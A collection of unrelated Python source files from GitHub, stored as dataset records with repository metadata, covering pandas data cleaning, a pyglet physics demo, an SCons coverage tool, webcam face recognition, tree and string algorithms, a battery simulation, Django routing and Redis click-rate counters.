(Même addresse à une même date)\n combined = combined.drop_duplicates(subset=[\"Jour\",\"Mois\",\"Année\",\"Code departement\",\"Code commune\",\"Code voie\"],keep=False)\n combined[\"Catégorie Surface terrain\"] = [\"Petite\" if x<=100 else \"Moyenne\" if x<=10000 else \"Grande\" for x in combined[\"Surface terrain\"]]\n combined[\"Id\"] = combined.index\n #Dataframe ventilé en fonction des différents axes d'analyse intéressants\n\n # Suppression des lignes sans valeur foncière\n combined[\"Valeur fonciere\"] = combined[\"Valeur fonciere\"].replace(\",\",\".\").astype(float)\n combined = combined[combined[\"Valeur fonciere\"] >1 & combined[\"Valeur fonciere\"].notna()]\n log_lat = log_lat[['nom_departement', 'nom_region','code_commune_INSEE', 'nom_commune_postal', 'latitude', 'longitude']]\n combined = pd.merge(combined, log_lat, left_on='Commune', right_on='nom_commune_postal')\n return combined\n\ndef processDataforPrediction(combined:pd.DataFrame):\n #Suppression des colonnes completement nulles\n cleaned = combined.dropna(axis=1, how='all')\n cleaned = cleaned.drop_duplicates(subset=[\"Jour\",\"Mois\",\"Année\",\"Code departement\",\"Code commune\",\"Code voie\"])\n cleaned.drop([\"Année\",\"Mois\",\"Jour\",\"Date mutation\"])\n cleaned = cleaned[cleaned[\"Valeur fonciere\"] != 0 & cleaned[\"Valeur fonciere\"] != 1 & cleaned[\"Valeur fonciere\"].notna()]\n percentage_missing = (cleaned.isna().sum() / len(cleaned)) * 100\n for colonne in cleaned:\n if percentage_missing[colonne] > 80 & colonne != \"Type local\":\n cleaned.drop(colonne, axis=1, inplace=True) \n \n return cleaned\n","repo_name":"LeoGondouin/ML_Python","sub_path":"controllers/process/ImportController.py","file_name":"ImportController.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9173140618","text":"from oop import *\n# bouncing ball with air and fluid resistance\n\nclass Liquid(pyglet.shapes.Rectangle):\n def __init__(self, win, *args, **kwargs):\n super().__init__(color=(0, 0, 255), *args, **kwargs)\n self.win = win\n self.opacity = 150\n self.c = 1\n \n\nclass Ball(pyglet.shapes.Circle):\n def __init__(self, win, *args, **kwargs):\n super().__init__(radius=20, color=(255, 0, 0), *args, **kwargs)\n self.win = win\n self.opacity = 150\n self.dx = 2\n self.dy = 2\n self.radius = random.randint(5, 50)\n self.m = self.radius / 10\n self.gravity = 0, -0.1\n self.wind = 0.02, 0\n \n def update(self, dt):\n self.dx += (self.gravity[0] + self.wind[0]/self.m)\n self.dy += (self.gravity[1] + self.wind[1]/self.m)\n \n self.x += self.dx\n self.y += self.dy\n \n if self.x < self.radius:\n self.dx = abs(self.dx)\n elif self.x > self.win.width-self.radius:\n self.dx = -abs(self.dx)\n \n if self.y < self.radius:\n self.dy = abs(self.dy)\n elif self.y > self.win.height-self.radius:\n self.dy = -abs(self.dy)\n \n def is_inside_rect(self, x, y, w, h):\n return x < self.x < x+w and y < self.y < y+h\n \n def drag(self, liq):\n v = (self.dx ** 2 + self.dy ** 2) ** 0.5\n \n \nclass AppWindow(pyglet.window.Window):\n # This is the app window\n def __init__(self, *args):\n super().__init__(*args)\n self.liquid = Liquid(self, 0, 0, self.width, self.height//3)\n \n n = 10\n self.balls = []\n for i in range(n):\n x = random.randint(0, self.width)\n y = random.randint(0, self.height)\n b = Ball(self, x=x, y=y)\n self.balls.append(b)\n pyglet.clock.schedule_interval(b.update, 1/120.0)\n \n self.status = pyglet.text.Label('status', x=10, y=10)\n self.clear()\n\n def on_draw(self):\n self.clear() \n for ball in self.balls:\n ball.draw()\n self.liquid.draw()\n \n def on_mouse_press(self, x, y, button, modifiers):\n self.balls[0].x = x\n self.balls[0].y = y\n\nif __name__ == '__main__':\n win = AppWindow(800, 300)\n win1 = AppWindow(600, 400)\n pyglet.app.run()\n sys.exit()\n","repo_name":"rasql/edunum","sub_path":"doc/oop/oop5.py","file_name":"oop5.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"10037854567","text":"def AddCoverageSetup(env):\n \"\"\"Add coverage related build steps and dependency links.\n\n Args:\n env: a leaf environment ready to have coverage steps added.\n \"\"\"\n # Add a step to start coverage (for instance windows needs this).\n # This step should get run before and tests are run.\n if env.get('COVERAGE_START_CMD', None):\n start = env.Command('$COVERAGE_START_FILE', [], '$COVERAGE_START_CMD')\n env.AlwaysBuild(start)\n else:\n start = []\n\n # Add a step to end coverage (used on basically all platforms).\n # This step should get after all the tests have run.\n if env.get('COVERAGE_STOP_CMD', None):\n stop = env.Command('$COVERAGE_OUTPUT_FILE', [], '$COVERAGE_STOP_CMD')\n env.AlwaysBuild(stop)\n else:\n stop = []\n\n # start must happen before tests run, stop must happen after.\n for group in env.SubstList2('$COVERAGE_TARGETS'):\n group_alias = env.Alias(group)\n # Force each alias to happen after start but before stop.\n env.Requires(group_alias, start)\n env.Requires(stop, group_alias)\n # Force each source of the aliases to happen after start but before stop.\n # This is needed to work around non-standard aliases in some projects.\n for test in group_alias:\n for s in test.sources:\n env.Requires(s, start)\n env.Requires(stop, s)\n\n # Add an alias for coverage.\n env.Alias('coverage', [start, stop])\n\n\ndef generate(env):\n # NOTE: SCons requires the use of this name, which fails gpylint.\n \"\"\"SCons entry point for this tool.\"\"\"\n\n env['COVERAGE_ENABLED'] = True\n\n env.SetDefault(\n # Setup up coverage related tool paths.\n # These can be overridden elsewhere, if needed, to relocate the tools.\n COVERAGE_MCOV='mcov',\n COVERAGE_GENHTML='genhtml',\n COVERAGE_ANALYZER='coverage_analyzer.exe',\n COVERAGE_VSPERFCMD='VSPerfCmd.exe',\n COVERAGE_VSINSTR='vsinstr.exe',\n\n # Setup coverage related locations.\n COVERAGE_DIR='$TARGET_ROOT/coverage',\n COVERAGE_HTML_DIR='$COVERAGE_DIR/html',\n COVERAGE_START_FILE='$COVERAGE_DIR/start.junk',\n COVERAGE_OUTPUT_FILE='$COVERAGE_DIR/coverage.lcov',\n\n # The list of aliases containing test execution targets.\n COVERAGE_TARGETS=['run_all_tests'],\n )\n\n # Add in coverage flags. These come from target_platform_xxx.\n env.Append(\n CCFLAGS='$COVERAGE_CCFLAGS',\n LIBS='$COVERAGE_LIBS',\n LINKFLAGS='$COVERAGE_LINKFLAGS',\n SHLINKFLAGS='$COVERAGE_SHLINKFLAGS',\n )\n\n # Change the definition of Install if required by the platform.\n if env.get('COVERAGE_INSTALL'):\n env['PRECOVERAGE_INSTALL'] = env['INSTALL']\n env['INSTALL'] = env['COVERAGE_INSTALL']\n\n # Add any extra paths.\n env.AppendENVPath('PATH', env.SubstList2('$COVERAGE_EXTRA_PATHS'))\n\n # Add coverage start/stop and processing in deferred steps.\n env.Defer(AddCoverageSetup)\n","repo_name":"Labs22/BlackServerOS","sub_path":"cryptography/keyczar-master/keyczar-master/cpp/src/tools/swtoolkit/site_scons/site_tools/code_coverage.py","file_name":"code_coverage.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"32959917636","text":"import pandas as pd\ndef get_trial_task(sentence,status_response_check):\n word = sentence\n print(word)\n word_list= word.split(' ')\n print(word_list)\n path = './././hr/trial_model/STR.xlsx'\n dataf = pd.read_excel(path)\n print(dataf)\n column_1=dataf['External Ref.']\n #new_col = str.column_1\n col_1 = column_1.str.lower()\n #new=((column_1)['External Ref.'])column_1\n print(column_1)\n\n for d in word_list:\n status = dataf[d == col_1]['Status']\n task_id = dataf[d == col_1]['Task ID']\n task_name=dataf[d == col_1]['External Ref.']\n task_exe=(dataf[d == col_1]['Execution Time'].astype(str))\n task_err=dataf[d == col_1]['Error Count']\n status_df = pd.concat([status,task_id,task_name,task_exe,task_err],axis =1)\n print(\"Status\",status)\n if status_response_check == 'status_name':\n return status_df\n else:\n return 'No data found'\n return 'No data found'\n\n","repo_name":"quinnoxai/calypso","sub_path":"hr/trial_model/status_by_name.py","file_name":"status_by_name.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3594443773","text":"import shutil, pathlib\n\nfile = str(input(\"请输入欲要复制的档名(可含副档名):\"))\ncopyFile = str(input(\"请输入复制档案的名称(可含副档名):\"))\n\npath = pathlib.Path.cwd() / copyFile\n\nif path.exists() == True:\n print(\"\\n该档名已存在\")\nelse:\n is_Success = shutil.copyfile(file, copyFile)\n print(\"已复制完成档案{}:\".format(is_Success))\n\n is_Move = shutil.move(copyFile, \"D:\\\\\")\n print(\"并移动至该路径:{}\".format(is_Move))\n","repo_name":"thomaslao/python","sub_path":"MP32104_Example/ch10/ExShutil.py","file_name":"ExShutil.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"7120347912","text":"import face_recognition\nimport cv2\nimport pickle\n\n\n\ndef predict(frame, knn_clf=None, model_path=None, distance_threshold=0.6):\n \"\"\"\n Recognizes faces in given image using a trained KNN classifier\n :param X_img_path: path to image to be recognized\n :param knn_clf: (optional) a knn classifier object. if not specified, model_save_path must be specified.\n :param model_path: (optional) path to a pickled knn classifier. if not specified, model_save_path must be knn_clf.\n :param distance_threshold: (optional) distance threshold for face classification. the larger it is, the more chance\n of mis-classifying an unknown person as a known one.\n :return: a list of names and face locations for the recognized faces in the image: [(name, bounding box), ...].\n For faces of unrecognized persons, the name 'unknown' will be returned.\n \"\"\"\n # if not os.path.isfile(X_img_path) or os.path.splitext(X_img_path)[1][1:] not in ALLOWED_EXTENSIONS:\n # raise Exception(\"Invalid image path: {}\".format(X_img_path))\n\n # if knn_clf is None and model_path is None:\n # raise Exception(\"Must supply knn classifier either thourgh knn_clf or model_path\")\n\n # Load a trained KNN model (if one was passed in)\n if knn_clf is None:\n with open(model_path, 'rb') as f:\n knn_clf = pickle.load(f)\n\n # frame = X_img_path\n # Load image file and find face locations\n # X_img = face_recognition.load_image_file(X_img_path)\n X_face_locations = face_recognition.face_locations(frame)\n\n # If no faces are found in the image, return an empty result.\n if len(X_face_locations) == 0:\n return []\n\n # Find encodings for faces in the test iamge\n faces_encodings = face_recognition.face_encodings(frame, known_face_locations=X_face_locations)\n\n # Use the KNN model to find the best matches for the test face\n closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)\n print(\"close\",closest_distances)\n are_matches = [closest_distances[0][i][0] <= distance_threshold for i in range(len(X_face_locations))]\n print(\"**********************\")\n print(\"face\", knn_clf.predict(faces_encodings))\n print(\"xface\", X_face_locations)\n print(\"are\",are_matches)\n print(\"close\",closest_distances)\n print(\"************end***********\")\n\n fourth = closest_distances\n print(\"fou1\", type(fourth[0]))\n print(\"f_tols\", fourth[0].tolist())\n print(\"sunm\", sum(fourth[0].tolist(), []))\n fourth = list(map(lambda x : int(x*100), sum(fourth[0].tolist(), [])))\n print(\"fou2\", fourth)\n\n\n # Predict classes and remove classifications that aren't within the threshold\n # return [(pred, loc) if rec else (\"unknown\", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)] orignal without percentage\n\n return [(pred, loc, clos) if rec else (\"unknown\", loc, clos) for pred, loc, rec, clos in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches, fourth)]\n\n\ndef show_prediction_labels_on_image(frame, predictions):\n \"\"\"\n Shows the face recognition results visually.\n :param img_path: path to image to be recognized\n :param predictions: results of the predict function\n :return:\n \"\"\"\n # pil_image = Image.open(img_path).convert(\"RGB\")\n # draw = ImageDraw.Draw(pil_image)\n print(\"percentage is :\", predictions)\n for name, (top, right, bottom, left), percen in predictions:\n print(\"percentage is :\", predictions)\n # # Draw a box around the face using the Pillow module\n # draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))\n\n # # There's a bug in Pillow where it blows up with non-UTF-8 text\n # # when using the default bitmap font\n # name = name.encode(\"UTF-8\")\n\n # # Draw a label with a name below the face\n # text_width, text_height = draw.textsize(name)\n # draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))\n # draw.text((left + 6, bottom - text_height - 5), name, fill=(255, 255, 255, 255))\n\n # frame = img_path\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name + str(percen)+\"%\", (left + 6, bottom - 6), font, 0.8, (255, 255, 255), 1)\n\n # Remove the drawing library from memory as per the Pillow docs\n # del draw\n\n # Display the resulting image\n # pil_image.show()\n return frame\n\n\n\nvideo_capture = cv2.VideoCapture(0)\n# video_capture = cv2.VideoCapture('rtsp://test:test$1234@192.168.0.73:554/Streaming/channels/202/')\n\nwhile True:\n # Grab a single frame of video\n ret, frame = video_capture.read()\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_frame = frame[:, :, ::-1]\n\n predictions = predict(frame, model_path=\"trained_knn_model.clf\")\n\n # Print results on the console\n for name, (top, right, bottom, left), percen in predictions:\n print(\"- Found {} at ({}, {})\".format(name, left, top))\n\n # Display results overlaid on an image\n frame = show_prediction_labels_on_image(frame, predictions)\n\n # # Find all the faces and face enqcodings in the frame of video\n # face_locations = face_recognition.face_locations(rgb_frame)\n # face_encodings = face_recognition.face_encodings(rgb_frame, face_locations)\n\n # # Loop through each face in this frame of video\n # for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n # # See if the face is a match for the known face(s)\n # matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n\n # name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # # Draw a box around the face\n # cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # # Draw a label with a name below the face\n # cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n # font = cv2.FONT_HERSHEY_DUPLEX\n # cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()","repo_name":"bhaweshchandola/Machine-Learning","sub_path":"Face Recognition/knn_live.py","file_name":"knn_live.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15234684310","text":"import os\nimport re\nimport sys\n\n\ndef main(argv):\n if len(argv) != 3:\n raise Exception(\n 'Usage: %s output_path list_files' % os.path.basename(argv[0]))\n\n output_path = argv[1]\n list_path = argv[2]\n\n with open(list_path) as list_file:\n file_names = list_file.read().split(' ')\n\n with open(output_path, 'wt') as output_file:\n for file_name in file_names:\n with open(file_name) as input_file:\n output_file.write('// %s\\n' % file_name)\n output_file.write(input_file.read())\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","repo_name":"eval1749/evita","sub_path":"evita/dom/bindings/scripts/concatenate.py","file_name":"concatenate.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29923009671","text":"import math\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\n\nfrom ml.algo.k_means.Cluster import Cluster\n\n\nclass KMeans:\n\n def __init__(self, training_samples, validation_samples):\n self._training_samples = training_samples\n self._validation_samples = validation_samples\n\n def find_clusters(self, num_clusters):\n # number of dimensions for the centroid\n centroid_num_dimensions = self._training_samples[0].features.shape[0]\n clusters = [Cluster(centroid_num_dimensions) for _ in range(num_clusters)]\n distance_between_current_and_prev_centroid_for_clusters = [9999999999 for _ in range(len(clusters))]\n\n iter_num = 0\n\n while not all(map(lambda distance: math.isclose(distance, 0, abs_tol=0.001), distance_between_current_and_prev_centroid_for_clusters)):\n\n samples_by_clusters = self.group_samples_by_clusters(clusters, self._training_samples)\n\n for cluster, samples in samples_by_clusters.items():\n cluster.update_samples_in_cluster(samples)\n\n distance_between_current_and_prev_centroid_for_clusters = list(map(Cluster.distance_between_current_and_prev_centroid, clusters))\n\n print('Itr num = {}, difference in centroids from previous iteration = {}'.format(iter_num,\n distance_between_current_and_prev_centroid_for_clusters))\n\n iter_num += 1\n\n return self.mean_square_error(clusters), clusters\n\n @staticmethod\n def mean_square_error(clusters):\n return sum(map(Cluster.mean_square_error, clusters)) / len(clusters)\n\n def group_samples_by_clusters(self, clusters, samples):\n \"\"\"\n Group samples by clusters\n :param clusters: distinct clusters to group samples by\n :return: a map of cluster to list of samples belonging to that cluster\n \"\"\"\n samples_by_clusters = {cluster: list() for cluster in clusters}\n\n for sample in samples:\n distance_cluster_map = {cluster.find_distance_from_centroid(sample.features):cluster for cluster in clusters}\n cluster_for_sample = distance_cluster_map[min(distance_cluster_map.keys())]\n samples_by_clusters[cluster_for_sample].append(sample)\n\n assert len(self._training_samples) == sum(map(len, samples_by_clusters.values())), 'Expected total number of training samples to match the sum of samples in all clusters'\n return samples_by_clusters\n\n @staticmethod\n def mean_square_separation(clusters):\n mss = 0\n\n for i in range(len(clusters)):\n for j in range(i):\n if i != j:\n mss += (clusters[i].find_distance_from_centroid(clusters[j].centroid) ** 2)\n\n return mss / ((len(clusters) * (len(clusters) - 1)) / 2)\n\n def mean_entropy(self, clusters):\n num_training_samples = len(self._training_samples)\n\n mean_entropy_value = 0\n\n for cluster in clusters:\n mean_entropy_value += ((len(cluster.samples_in_cluster) / num_training_samples) * cluster.entropy())\n\n return mean_entropy_value\n\n def compute_accuracy(self, clusters):\n predicted_labels = []\n actual_labels = []\n correct_predictions = 0\n\n for validation_sample in self._validation_samples:\n distance_cluster_map = {cluster.find_distance_from_centroid(validation_sample.features):cluster for cluster in clusters}\n cluster_for_sample = distance_cluster_map[min(distance_cluster_map.keys())]\n\n predicted_label = cluster_for_sample.most_common_label()\n actual_label = validation_sample.true_class_label\n\n if predicted_label == actual_label:\n correct_predictions += 1\n\n predicted_labels.append(predicted_label)\n actual_labels.append(actual_label)\n\n validation_samples_confusion_matrix = confusion_matrix(y_true=actual_labels, y_pred=predicted_labels)\n\n confusion_matrix_display = ConfusionMatrixDisplay(validation_samples_confusion_matrix, display_labels=range(10))\n confusion_matrix_display.plot(values_format='d')\n\n plt.title('Confusion matrix')\n\n plt.savefig('out/confusion-matrix.png', format='png', dpi=1200)\n plt.show()\n\n accuracy = (correct_predictions / len(self._validation_samples)) * 100\n print('Accuracy = {}%'.format(accuracy))\n\n @staticmethod\n def print_centroid(clusters):\n for num, cluster in enumerate(clusters):\n plt.imshow(cluster.centroid.reshape(8,8), cmap='Greys')\n\n common_label = cluster.most_common_label()\n plt.title('No samples in cluster' if common_label is None else 'Samples with the most common class label in this cluster = {}'.format(common_label))\n\n plt.savefig('out/{}-centroid-visual.png'.format(num), format='png', dpi=1200)\n plt.show()\n","repo_name":"pkaran57/ML","sub_path":"ml/algo/k_means/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74274596951","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import include, path\n\nfrom drf_yasg2 import openapi\nfrom drf_yasg2.views import get_schema_view\n\nfrom rest_framework.permissions import AllowAny\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Helsi_clone API\",\n default_version='v1',\n description=\"About\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[AllowAny],\n)\nurlpatterns = [\n path('auth', include('apps.auth.urls')),\n path('users', include('apps.users.urls')),\n path('doctors', include('apps.doctors.urls')),\n path('patients', include('apps.patients.urls')),\n path('medical_cards', include('apps.medical_cards.urls')),\n path('doc',schema_view.with_ui('swagger',cache_timeout=0)),\n]\n\n# handler500 = 'rest_framework.exceptions.server_error'\n# handler400 = 'rest_framework.exceptions.bad_request'\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"KuzykY/helsi-clone","sub_path":"backend/configs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32717976155","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\"\"\"\n Goal: recover the binary search tree which has two elements exchanged.\n Idea: \n 1.Just like sorted linked list, both moving-forward one and moving\n -backward one will make mistake when comparing with the elements\n between the moved position and orignal position. And when we tra-\n verse the binary search tree inorder, it's just the same as the\n sorted linked list.(Notice that the two positions can be adjacent!)\n 2. Morris Traversal can achieve O(1) space cost. \n\"\"\"\nclass Solution(object):\n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if not root: return None\n INF = 1e10\n visited_node= TreeNode(-INF)\n wrong_node1 = wrong_node2 = None\n wrong_node1_next = None\n stack = []\n cur_node = root\n while stack or cur_node:\n if cur_node:\n # first go left and push all node into stack(this is the\n # first-time visit for each node)\n stack.append(cur_node)\n cur_node = cur_node.left\n else:\n # once reach the left-bottom None, pop out node from stack,\n # which is the second time visit for the popped node\n cur_node = stack.pop()\n # find the inorder node\n if visited_node.val >= cur_node.val:\n if not wrong_node1:\n wrong_node1 = visited_node\n wrong_node1_next = cur_node\n else:\n wrong_node2 = cur_node\n break\n visited_node = cur_node\n # after that we will go right, start to find next inorder node\n # (root --> the deepest left(None) --> back one step(found inorder node)\n # --> assign its right node as root)\n cur_node = cur_node.right\n\n if wrong_node1:\n # These two exchanged positions are adjacent in inorder traversal\n if not wrong_node2: wrong_node2 = wrong_node1_next \n temp = wrong_node1.val\n wrong_node1.val = wrong_node2.val\n wrong_node2.val = temp\n\n return None\n","repo_name":"LingxiaoShawn/leetcode","sub_path":"tree/99.recover-binary-search-tree.py","file_name":"99.recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"21102494471","text":"\"\"\"\nNote the performance for SPM is not great at high C-rates\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport SPPy\n\n\n# Experimental data\ndf_exp = pd.read_csv('DST_25C.csv')\ndf_exp = df_exp[df_exp['Step_Index'] > 4]\nt_exp = df_exp['t [s]'].to_numpy()\nt_exp = t_exp - t_exp[0]\nI_exp = df_exp['I [A]'].to_numpy()\nV_exp = df_exp['V [V]'].to_numpy()\n\n# Modelling parameters\nSOC_n_min=0.01073305\nSOC_n_max=0.82852023\nSOC_p_min=0.41553058\nSOC_p_max=0.90207103\n\nSOC_init_p, SOC_init_n = SOC_p_min, SOC_n_max\nT = 298.15 # in K\n\n# Setup cycler and battery cell\ncycler = SPPy.CustomCycler(t_array=t_exp, I_array=I_exp, SOC_LIB=1.0)\ncycler.plot()\ncell = SPPy.BatteryCell(parameter_set_name='Calce_OCV', SOC_init_p=SOC_init_p, SOC_init_n=SOC_init_n, T=T)\nsolver = SPPy.SPPySolver(b_cell=cell, N=5, isothermal=True, degradation=False, electrode_SOC_solver='poly')\n\n# simulate and plot\nsol = solver.solve(cycler_instance=cycler, verbose=True, t_increment=1)\n\n# plot\nplt.plot(t_exp, V_exp)\nplt.plot(sol.t, sol.V)\n\nplt.show()\n\nsol.comprehensive_plot()\n\n\n","repo_name":"m0in92/SPPy","sub_path":"examples/custom_cycler/Calce_DST.py","file_name":"Calce_DST.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1324379768","text":"# Time complexity: O(n). \n \n# Auxiliary Space: O(n). \n\n# intution : use LPS algorithm\n\ndef computeLPSArray(string):\n \n M = len(string)\n lps = [None] * M\n \n length = 0\n lps[0] = 0 \n\n i = 1\n while i < M:\n \n if string[i] == string[length]:\n \n length += 1\n lps[i] = length\n i += 1\n \n else: # (str[i] != str[len])\n \n if length != 0:\n \n length = lps[length - 1]\n \n # Also, note that we do not\n # increment i here\n \n else: # if (len == 0)\n \n lps[i] = 0\n i += 1\n \n return lps\n \n\ndef solve(string):\n \n revStr = string[::-1]\n \n # Get concatenation of string,\n # special character and reverse string\n concat = string + '$' + revStr\n\n \n # Get LPS array of this\n # concatenated string\n lps = computeLPSArray(concat)\n \n # By subtracting last entry of lps\n # vector from string length, we\n # will get our result\n return len(string) - lps[-1]\n \n\n\nstring = \"AACECAAAA\"\nprint(solve(string))\n","repo_name":"Thapamanish/450DSA","sub_path":"String/minInsertionAtBeginningTomakeAStringPalin.py","file_name":"minInsertionAtBeginningTomakeAStringPalin.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24599626095","text":"from datetime import datetime\nimport math\nimport time\n\n\ndef main():\n start_time = datetime.now() \n ans = my_func()\n dt = datetime.now() - start_time \n ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n print(f\"Ans {ans}, Duration: {ms/1000:.2f}\" % [ans,ms])\n\n\ndef my_func():\n max_count = 0\n max_p = 0\n for i in range(2,1001,2):\n no_of_train = get_no_of_trian(i)\n if(no_of_train > max_count):\n max_count = no_of_train\n max_p = i\n \n return max_p\n\n\n\ndef get_no_of_trian(p):\n count = 0\n\n for c in range(int(p/2)+1,-1,-1):\n \n if(3 * c - 3 < p):\n break\n\n for b in range(c-1,1,-1):\n\n if(c + 2 * b - 1 < p):\n break\n\n for a in range(b-1,1,-1):\n if(a+b+c < p):\n break\n \n if(a+b+c == p):\n if(a*a) + (b*b) == (c*c):\n count+=1\n\n return count\n\nmain()","repo_name":"nabint/project_euler","sub_path":"problem39.py","file_name":"problem39.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73142095831","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 08 15:30:33 2017\n\n@author: ligong\n\n@description:这是用来计数article的阅读uv,推送uv,以及点击率的uv\n\"\"\"\nfrom util import init_redis\n\nclass article_info(object):\n def __init__(self,name,config):\n \"\"\"\n name:对应的名字\n \"\"\"\n self.name = name.upper()\n article_info_redis = config['article_info_redis']\n host,port,db = article_info_redis['host'],article_info_redis['port'],article_info_redis['db']\n \n #初始化redis链接\n self.article_info_redis_conn = init_redis(host,port,db)\n \n #push文章的前缀\n self.push_prefix = 'ARTICLE_PUSH_%s_%s'\n \n #read文章的前缀\n self.read_prefix = 'ARTICLE_READ_%s_%s'\n \n #ratio文章的前缀\n self.ratio_prefix = 'ARTICLE_RATIO_%s_%s'\n \n #article信息\n self.article_info_prefix = 'ARTICLE_INFO_%s'\n \n def update_article_info(self,article_id,key,value):\n \"\"\"\n 更新文章信息\n \"\"\"\n self.article_info_redis_conn.hset(self.article_info_prefix % article_id,key,value)\n \n def update_article_ratio(self,article_id):\n \"\"\"\n 更新文章的点击率\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n read_key = self.read_prefix % (self.name,article_id)\n \n push_num = self.article_info_redis_conn.pfcount(push_key)\n read_num = self.article_info_redis_conn.pfcount(read_key)\n #有一个值是空,则不做任何(没有值)\n if push_num == None or read_num == None or int(push_num) == 0 or int(read_num) == 0:\n return\n \n ratio_key = self.ratio_prefix % (self.name,article_id)\n self.article_info_redis_conn.set(ratio_key,float(read_num)/float(push_num))\n \n def update_article_push(self,article_id,usid):\n \"\"\"\n 更新文章的推送\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n self.article_info_redis_conn.pfadd(push_key,usid)\n self.update_article_ratio(article_id)\n \n def update_article_read(self,article_id,usid):\n \"\"\"\n 更新文章的阅读\n \"\"\"\n read_key = self.read_prefix % (self.name,article_id)\n self.article_info_redis_conn.pfadd(read_key,usid)\n self.update_article_ratio(article_id)\n\n def read_ratio(self,article_id):\n \"\"\"\n 点击率\n \"\"\"\n ratio_key = self.ratio_prefix % (self.name,article_id)\n ratio = self.article_info_redis_conn.get(ratio_key)\n if ratio:\n return float(ratio)\n return 0\n \n def push_num(self,article_id):\n \"\"\"\n 推荐次数\n \"\"\"\n push_key = self.push_prefix % (self.name,article_id)\n push_num = self.article_info_redis_conn.pfcount(push_key) \n if push_num:\n return int(push_num)\n return 0\n\nif __name__ == '__main__':\n config = {'article_info_redis':{'host':'127.0.0.1','port':6379,'db':1}}\n ati = article_info('test',config)\n import time,random\n for i in range(10000):\n ati.update_article_info(i,'create_time',int(time.time())-8640*i)\n t = random.randint(0,9999)\n ati.update_article_push(i,i*3)\n ati.update_article_read(t,i*2)\n\n","repo_name":"cash2one/toutiao-1","sub_path":"toutiao_cache/article_info.py","file_name":"article_info.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11163183883","text":"# Улучшаем задачу 2.\n# 